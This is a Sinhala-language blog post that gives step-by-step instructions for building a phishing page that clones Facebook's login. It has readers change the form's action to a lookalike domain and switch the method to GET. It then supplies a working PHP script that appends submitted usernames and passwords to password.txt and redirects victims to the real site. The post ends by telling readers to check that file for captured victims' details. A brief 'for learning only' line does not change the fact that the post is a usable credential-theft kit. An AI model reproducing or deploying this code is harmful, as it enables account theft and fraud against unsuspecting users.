Phishing Web Site එකක් හදන්නේ කොහොමද ?
Phishing Web Site එකක් හදන්නේ කොහොමද ?
මම අද කියලා දෙන්නේ අනිත් අය රවට්ටන වෙබ් පිටුවක් හදන ආකාරයයි. මේකට කියන හරි වචනය Phishing කියලා. මාළු බාන එක ගැන අහලා ඇතිනේ. ඒ වගේම තමයි. ආස හිතෙන ඇමක් දාලා තමන්ට අවශ්ය දෙයක් වංචාවෙන් ලබාගැනීම. හැබැයි මේක කියලා දෙන්නේ කාටවත් කරදර කරන්න නෙවෙයි. මේ ගැන ඉගෙන ගන්න. ඒ වගේම මේවගේ දේවල් තියෙනවා කියන එක දැන ගන්න. එහෙනම් අපි පටන් ගමු.
1. ඉස්සර වෙලාම තමන්ට හදාගන්න ඕන පිටුවට අවශ්ය කරන Source
code එක ඇත්ත වෙබ් පිටුවෙන් ගන්න ඕන. ඒක කරන්නේ අවශ්ය
වෙබ් පිටුව ඕපන් කරලා එකේ Source code ඒක කොපි කරගන්න.
පිටුව උඩ right click කරලා "View Page Source" ක්ලික් කරන්න.
(මම මේකට ගන්නේ ෆේස්බුක් ඇතුළු වීමේ පිටුව)
2. දැන් නෝට්පෑඩ් එකක් ඕපන් කරලා එකට Code එක past කරගන්න.
3. දැන් action="https://www.facebook.com/login.php කියලා
ලියලා තියෙන කොටස හොයාගන්න ඕන.
4. දැන් මේ කොටස වෙනස් කරන්න ඕන තමන් හදන්න යන පිටුවේ
ලිපිනය ලෙසට. මම හදපු පිටුවේ ලිපිනය තමයි මේ තියෙන්නේ.
මේක ඔයාල හදන්න යන පිටුවේ නමට වෙනස් වෙන්න ඕන.
action="http://facebook.lkstuff.info/login.php
5. ඊළඟට method="post" කියන තැන හොයලා මේ විදියට වෙනස්
කරන්න. method="get"
6. දැන් මේ නෝට්පෑඩ් ඒක save as කරන්න ඕන Index.html කියන
නමින්. ඒ වගේම Save as Type කියන එක තියෙන්න ඕන All files
කියන එකේ.
7. දැන් තවත් අලුත් නෝට්පෑඩ් එකක් ඕපන් කරගෙන මෙන්න මේ
Code එක දාගන්න
<?php
header("Location: https://www.Facebook.com");
$handle = fopen("/home/lkstuf/public_html/facebook/password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
මෙතන නිල් පාටින් ලියලා තියෙන්නේ මම පාස්වර්ඩ් සේව් වෙන්න දීල තියෙන ෆයිල් එකේ නම සහ ඒක වෙබ් සර්වර් එකේ තියෙන තැන. මේ ෆයිල් එකත් Save as කරන්න login.php කියන නමින්. ඒ වගේම Save as Type කියන එක තියෙන්න ඕන All files කියන එකේ.
8. ඊළඟට තවත් අලුත් නෝට්පෑඩ් එකක් ඕපන් කරලා එක password.txt යන නමින් සේව් කරගන්න.
9. දැන් ඔයාලා ෆයිල් තුනක් හදලා තියෙනවා.
1. index.html
2. login.php
3. password.txt
10. දැන් මේ ෆයිල් ඔයාලා Host කරන සයිට් එකට අප්ලෝඩ් කරන්න. දැන් කරන්න ඕන දේවල් ඔක්කොම කරලා ඉවරයි. දැන් බලන්න Phishing site එක වැඩ කරනවද කියලා. හරියට වැඩ කරන්නේ නැතිනම් බලන්න ෆයිල් සේව් කරලා තියෙන තැන සහ File path හරියට තියෙනවද කියලා. ඔය ටික හරියට තියෙනවනම් මේක වැඩ කරනවා. ට්රයි කරලා බලලා password.txt ෆයිල් එක ඕපන් කරලා බලන්න ඒකට ඇවිල්ලා ඇති ට්රයි කරපු අයගේ විස්තර.
Comments
Post a Comment